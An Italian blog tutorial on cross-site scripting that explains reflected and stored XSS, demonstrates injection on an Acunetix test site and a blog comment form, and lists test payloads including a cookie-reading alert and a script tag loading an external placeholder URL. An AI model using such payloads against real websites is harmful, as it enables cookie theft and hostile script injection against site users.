fbpx
anatomy-of-a-xss
Tutorial Web App

Demo Cross Site Script – XSS Attack

di |Pubblicato -Aggiornato

Come Hackerare un Sito Web tramite Cross Site Script

Come promesso in un articolo precedente (Demo UserAgent & IP Logger), oggi inizieremo a parlare degli attacchi XSS Cross Site Script!

Premesso che L’argomento è vastissimo, gli attacchi XSS sono praticamente innumerevoli, limitati solo dalla fantasia, ma partiamo dalle basi :

In cosa consistono gli attacchi XSS?

Gli attacchi Cross Site Script (XSS) consistono nell’introdurre del codice lato client (all’interno di Form, di solito) per eseguire una serie di attacchi rivolti all’utente o amministratore di un sito. Con questo sistema è possibile eseguire redirect, furto di cookie, installare BackDoor, furto di informazioni personali e molto altro! Questa vulnerabilità affligge i siti dinamici che non controllano gli input lato client, per cui un codice inniettato all’interno di un form viene per suol dire, “sanitizzato” dal sistema, vuol dire che il codice viene incorporato, fuso, con il codice sorgente della pagina web, e di conseguenza eseguito dal client!

Illustriamo le due tipologie principali di attacchi Cross Site Script – XSS!

XSS – Cross Site Script Riflessi

Gli XSS Riflessi (non persistenti) sono molto frequenti, si hanno quando lo script inniettato dall’attaccante viene subito eseguito dal server, con “effetto immediato”. Facciamo un esempio:

Rechiamoci sul sito per i test dell’Acunetix: http://testphp.vulnweb.com/index.php

Ora inniettiamo nella barra del search il seguente script:

<script>alert(‘xss’);</script>

alert xss 1 Clicca per ingrandire

Premiamo INVIO!

alert 3Clicca per ingrandire

Il Risultato sarà una finestrella con scritto “XSS” (potete scrivere ciò che volete). Questo piccolo script è totalmente innocuo, ma serve a farci capire se la vulnerabilità esiste.

Le XSS Riflesse di solito vengono inviate per email, o in chat ad un utente. Il vantaggio è che il link da cliccare sarà per loro un sito attendibile.

XSS – Cross Site Script Persistenti

Le XSS Persistenti (o Stored) sono molto più pericolose in quanto lo script iniettato dall’attacante viene salvato all’interno del web server e viene eseguito ogni volta si visiti la pagina colpita.

Ad esempio attacchiamo un form dei commenti in un Blog. Inniettiamo lo script come in foto (come un normale commento).

xss persistent 1 Clicca per ingrandire

Inviamo il commento ed attendiamo…. Una volta accettato il commento, ne vedremo il risultato!

persistent 1 xss Clicca per ingrandire

La pericolosità delle XSS Persistenti stà nel fatto che chiunque visiti quella pagina (tipo un utente loggato) potrebbe essere dirottato (redirect) su un altro sito o eseguire del codice javascript pericoloso!

Tenete presente che le Cross Site Script (XSS) sono dei vettori di attacco talvolta molto efficaci!

Possibili Script da usare per i test:

<h1>test</h1>

<script>alert(‘xss’);</script>

<script>alert(document.cookie);</script>

<script src=”http://LinkPersonalizzatoCodiceJavaPreferito.js”></script>

Per usufruire di una vasta gamma di Tool Online vi rimandiamo al seguente sito: http://www.xss-payloads.com/index.html

Vi ricordiamo, al solito, che abusare di queste tecniche è reato penale!

Se avete domande, contattatemi QUI😉

Grazie per la lettura!

Potrebbe anche interessarti

Shodan Search Engine Device Router
Pubblicato

Shodan – Guida Step By Step

Nell’articolo precedente abbiamo spiegato cos’è Shodan e mostrato qualche immagine. Shodan – Motore di Ricerca Hacker Oggi vedremo Passo dopo Passo un […]

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

2 commenti su “Demo Cross Site Script – XSS Attack”